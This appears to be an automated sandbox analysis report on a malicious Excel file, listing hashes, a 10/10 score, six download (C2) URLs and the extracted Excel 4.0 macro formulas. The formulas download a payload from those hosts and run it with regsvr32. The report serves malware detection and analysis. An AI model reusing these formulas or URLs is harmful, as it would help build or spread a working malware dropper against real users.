General

  • Target

    3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b

  • Size

    29KB

  • Sample

    241111-w4lq3atcmn

  • MD5

    83a9d33633b5d860d1f23980d432c773

  • SHA1

    707ecacd3604c35017a2daa8961301a653e6187f

  • SHA256

    3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b

  • SHA512

    84c8747f8d8f728ba2a50e1ab4efb0204d766c8cfca219fb8576241c107c7250cda3cd775309193c3854dd2f10d8d64a71e6e03fa1f6c5b77275f5629eda3cdf

  • SSDEEP

    384:VDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:JPELA2s61VECvgOZS4+NcDVOXD9F4IG

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://janshabd.com/E33ZFv/

    http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

    http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/

    http://www.aacitygroup.com/mordacity/g29PQhuYA5x/

    http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/

    https://sse-studio.com/cq0xhpj/wdktmllfAYV/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/E33ZFv/","..\dw.ocx",0,0)
    =IF('OFJOV'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/","..\dw.ocx",0,0))
    =IF('OFJOV'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/","..\dw.ocx",0,0))
    =IF('OFJOV'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.aacitygroup.com/mordacity/g29PQhuYA5x/","..\dw.ocx",0,0))
    =IF('OFJOV'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/","..\dw.ocx",0,0))
    =IF('OFJOV'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sse-studio.com/cq0xhpj/wdktmllfAYV/","..\dw.ocx",0,0))
    =IF('OFJOV'!D21<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dw.ocx")
    =RETURN()

Extracted

  • Language

    xlm4.0

  • Source / URLs

    xlm40.dropper: http://janshabd.com/E33ZFv/

    xlm40.dropper: http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

Targets

  • Target

    3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b (size, hashes and score as listed under General above)

  Signatures
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
